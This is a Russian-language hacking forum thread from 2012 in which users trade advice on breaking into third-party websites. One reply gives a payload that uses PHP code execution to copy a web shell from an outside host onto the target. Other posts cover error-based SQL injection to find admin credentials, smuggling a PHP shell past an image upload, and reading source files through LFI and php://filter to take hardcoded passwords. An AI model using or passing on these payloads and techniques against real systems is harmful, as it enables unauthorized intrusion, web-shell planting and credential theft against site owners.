31.01.2012, 14:12
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от pirat0
2Ereee,
я не понял твой запрос, но дело в том что я вывожу таблицы с ошибки (Duplicate entry), вставил твой запрос написало bad request?
Ну так все выведи через лимит. Потом найди таблицы типа permissons и т.д.
|
|
|
31.01.2012, 15:21
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Есть выполнение php скрипта на сайте, как залить шелл?
http://www.site.com/index.php?s=10&id=phpinfo();
mq=on
|
|
|
|
31.01.2012, 15:24
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
base64_decode([]);
где [] — copy('http://site1.tu/shell.txt', './shell.php'); в base64
|
|
|
|
31.01.2012, 16:23
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от Ereee
Ну так все выведи через лимит. Потом найди таблицы типа permissons и т.д.
так в этом и вся проблема, таблицы типа user_rights, user_permisson, admin_user и т.п. нет.
а ты говорил что пасс может быть в файле, это как то можно проверить?? (всмисле через запрос к мускулу)
|
|
|
|
31.01.2012, 16:26
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от pirat0
так в этом и вся проблема, таблицы типа user_rights, user_permisson, admin_user и т.п. нет.
а ты говорил что пасс может быть в файле, это как то можно проверить?? (всмисле через запрос к мускулу)
пасс в файле, такое встречается на околоафриканских сайтах, или в ретро web -е, если нету таблиц значит они в другой базе, если нету таблиц для админа значит авторизация через пароли которые хранятся внутри скрипта, включите фантазию
|
|
|
|
31.01.2012, 16:34
|
|
Участник форума
Регистрация: 23.11.2009
Сообщений: 107
С нами:
8666229
Репутация:
44
|
|
Надоело уже плодить темы с моими вопросами по залитию шелла, так что если я тут задам свой небольшой вопрос, надеюсь никто не будет возражать?
Могу менять имя и расширение загружаемого файла через пост запрос, но, шелл в формате jpg не грузит, так как при загрузке меняются размеры изображения и выкидывается ошибка, если в картинку в конец прописать мини-шелл и загрузить (естественно переименовать расширение в пхп), то он не работает, и вижу я только код картинки.
Кто что посоветует сделать?
|
|
|
|
31.01.2012, 16:38
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от Konqi
если нету таблиц значит они в другой базе
базы тоже проверял, только две - information_schema и текущяя
Сообщение от Konqi
если нету таблиц для админа значит авторизация через пароли которые хранятся внутри скрипта, включите фантазию
где про это можно поподробнее прочитать??
|
|
|
|
31.01.2012, 16:46
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от pirat0
базы тоже проверял, только две - information_schema и текущяя
где про это можно поподробнее прочитать??
о чем прочитать? нечего там прочитать, если этот тот случий тогда вам нужен file_priv или другие средства (читалка чтоли) чтоб смотреть исходники файлов, стянуть пароль
|
|
|
|
31.01.2012, 16:56
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от Konqi
о чем прочитать? нечего там прочитать, если этот тот случий тогда вам нужен file_priv или другие средства (читалка чтоли) чтоб смотреть исходники файлов, стянуть пароль
command denied to user - file_priv нету
(читалка это я так понимаю из розряда LFI??)
|
|
|
|
31.01.2012, 17:04
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от pirat0
command denied to user - file_priv нету
(читалка это я так понимаю из розряда LFI??)
или LFI с возможностю читать исходники с помощю php://filter, или читалка, file_get_contents, fopen, прочее
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
